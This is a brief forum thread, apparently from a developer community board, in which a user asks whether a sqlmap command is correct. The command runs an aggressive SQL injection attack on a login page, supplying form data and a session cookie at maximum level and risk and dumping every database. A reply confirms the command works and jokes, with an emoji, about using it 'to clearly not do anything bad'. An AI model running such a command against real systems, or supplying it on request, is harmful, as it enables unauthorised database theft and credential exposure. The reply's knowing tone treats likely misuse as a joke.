### DISCUSSION TITLE
SQL

### DISCUSSION THREAD

**Discussion by XORPIOv** [community/community#123813] [Other Feature Feedback, Questions, & Ideas]
### Select Topic Area

Product Feedback

### Body

is this a right command ?
sqlmap -u "http://target.com/login.php" --data="username=admin&password=12345&submit=login" --cookie="PHPSESSID=abcdef1234567890" --level=5 --risk=3 --dump-all

**Comment by richdentistboy** [comment]
it is indeed a right command and it should work if ur using sqlmap to clearly not do anything bad 😁
